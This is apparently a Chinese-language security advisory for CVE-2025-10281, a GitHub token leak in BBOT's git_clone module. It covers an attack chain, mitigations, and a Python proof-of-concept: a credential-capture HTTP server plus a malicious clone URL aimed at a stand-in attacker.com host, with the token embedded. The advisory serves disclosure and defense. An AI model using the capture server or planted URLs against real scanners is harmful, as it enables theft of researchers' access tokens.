CVE-2025-10281 BBOT git_clone模块GitHub API密钥泄露漏洞

漏洞信息

漏洞编号

CVE-2025-10281

漏洞类型

凭证泄露/信息泄露

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

BBOT

漏洞概述

CVE-2025-10281是BBOT（Black Lantern Security开发的自动化侦察与攻击面映射工具）git_clone模块中的一个凭证泄露漏洞。该漏洞由Black Lantern Security团队的安全研究人员发现并披露，CVSS评分为4.7，属于中危级别。

BBOT是一款广受安全社区欢迎的开源侦察框架，被众多红队和渗透测试人员用于自动化资产发现、子域名枚举、漏洞扫描等任务。BBOT的git_clone模块是其内置的功能之一，用于在侦察过程中克隆目标组织的GitHub代码仓库，以便进行代码审计和敏感信息搜索。

该漏洞的核心问题在于，当BBOT的git_clone模块处理用户提供的或从目标收集到的Git URL时，未对URL进行充分的安全验证和过滤。攻击者可以通过构造恶意的Git URL（例如使用`git://`协议或重定向机制），将本应发送到合法GitHub服务器的GitHub API密钥泄露到攻击者控制的服务器上。由于BBOT在执行git操作时会在URL中携带GitHub API认证凭据（如用户名和Personal Access Token），这些凭据会被发送到恶意服务器，从而导致API密钥泄露。

此漏洞的CVSS向量表明：攻击需要网络访问（AV:N），攻击复杂度低（AC:L），无需权限（PR:N），但需要用户交互（UI:R），作用范围发生变化（S:C），对机密性有低影响（C:L），对完整性和可用性无影响。该漏洞由Black Lantern Security于2025年10月9日公开披露。

技术细节

BBOT的git_clone模块在执行git clone操作时，会将GitHub API凭据（如Personal Access Token）嵌入到Git URL中，以便进行认证克隆受保护的私有仓库。然而，该模块在处理和传递Git URL时缺乏对URL scheme、主机名和协议的有效验证。

漏洞利用原理如下：

1. **凭据嵌入机制**：BBOT在调用git clone时，会将GitHub API Token以`https://<token>@github.com/...`的形式嵌入URL中，这是Git认证的标准做法。

2. **URL验证缺失**：git_clone模块未对传入的URL进行严格的主机名校验和白名单过滤，允许攻击者使用以下方式构造恶意URL：
- 使用`git://`协议配合自定义主机名
- 使用URL重定向（如利用GitHub自身的重定向功能）
- 利用SSH协议变体进行凭据泄露

3. **凭据泄露过程**：当BBOT使用包含API Token的恶意URL执行git操作时，Git客户端会将完整的URL（包括认证凭据）发送到攻击者控制的服务器。攻击者可以在其服务器日志中捕获到完整的GitHub API Token。

4. **利用场景**：攻击者可以在公共代码仓库、文档、社交媒体或其他可被BBOT自动爬取的位置放置恶意的Git URL。当安全研究人员或红队成员使用BBOT对这些目标进行侦察时，BBOT会自动尝试克隆这些仓库，从而触发凭据泄露。

5. **影响范围**：泄露的GitHub API Token可能被用于访问私有仓库、修改代码、创建issue、读取组织信息等，具体权限取决于Token的scope设置。

攻击链分析

STEP 1

步骤1：搭建恶意服务器

攻击者在其控制的服务器上搭建HTTP/Git服务，用于接收和记录来自BBOT的连接请求及其中包含的认证凭据。

STEP 2

步骤2：构造恶意Git URL

攻击者构造包含GitHub API Token占位符的恶意Git URL，该URL指向攻击者控制的服务器而非合法的GitHub服务器。

STEP 3

步骤3：植入恶意URL

攻击者将恶意Git URL放置在BBOT在侦察过程中会自动爬取和发现的位置，如公共代码仓库的README、文档站点、社交媒体等。

STEP 4

步骤4：触发BBOT扫描

安全研究人员或红队成员使用BBOT对包含恶意URL的目标进行自动化侦察，BBOT的git_clone模块发现并尝试克隆该仓库。

STEP 5

步骤5：凭据泄露

BBOT将包含GitHub API Token的完整URL发送到攻击者控制的服务器，攻击者从服务器日志中提取并获取有效的GitHub API凭据。

STEP 6

步骤6：利用泄露的凭据

攻击者使用泄露的GitHub API Token访问受害者的私有仓库、读取敏感代码、修改仓库内容或执行其他恶意操作，具体取决于Token的权限范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10281 - BBOT git_clone Module GitHub API Key Disclosure PoC # Attacker sets up a listener to capture leaked credentials # Step 1: Set up an attacker-controlled server to log incoming requests # Using a simple netcat listener or HTTP server import http.server import socketserver import sys class CredentialCaptureHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): # Log the full URL including any embedded credentials print(f"[CAPTURED] Path: {self.path}") print(f"[CAPTURED] Headers: {self.headers}") # Extract credentials from URL (format: https://[email protected]/...) if "@" in self.path: creds = self.path.split("@")[0].lstrip("/") print(f"[LEAKED CREDENTIALS] {creds}") self.send_response(200) self.end_headers() self.wfile.write(b"OK") def log_message(self, format, *args): pass # Suppress default logging # Step 2: Attacker places a malicious git URL in a location BBOT will crawl # The malicious URL redirects or points to attacker server while # containing the GitHub API token malicious_url = "https://x-access-token:[email protected]/fake-repo.git" # Step 3: When BBOT's git_clone module processes this URL, it will # send the request to attacker.com with the embedded token # The attacker captures the token in their server logs print(f"[*] Malicious URL: {malicious_url}") print("[*] Starting credential capture server on port 80...") # Uncomment to start the capture server # with socketserver.TCPServer(("", 80), CredentialCaptureHandler) as httpd: # httpd.serve_forever()

影响范围

BBOT git_clone模块的所有受影响版本（建议升级到最新修复版本）

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）为BBOT使用的GitHub API Token设置最小必要权限，并启用IP白名单限制；2）在BBOT配置中禁用git_clone模块或限制其仅处理已知可信的GitHub域名；3）定期审查和轮换GitHub API Token；4）在网络层面监控BBOT主机的出站连接，检测是否有向非GitHub域名的Git协议连接；5）使用专用的、权限受限的GitHub Token用于BBOT侦察任务，与个人或生产环境Token隔离。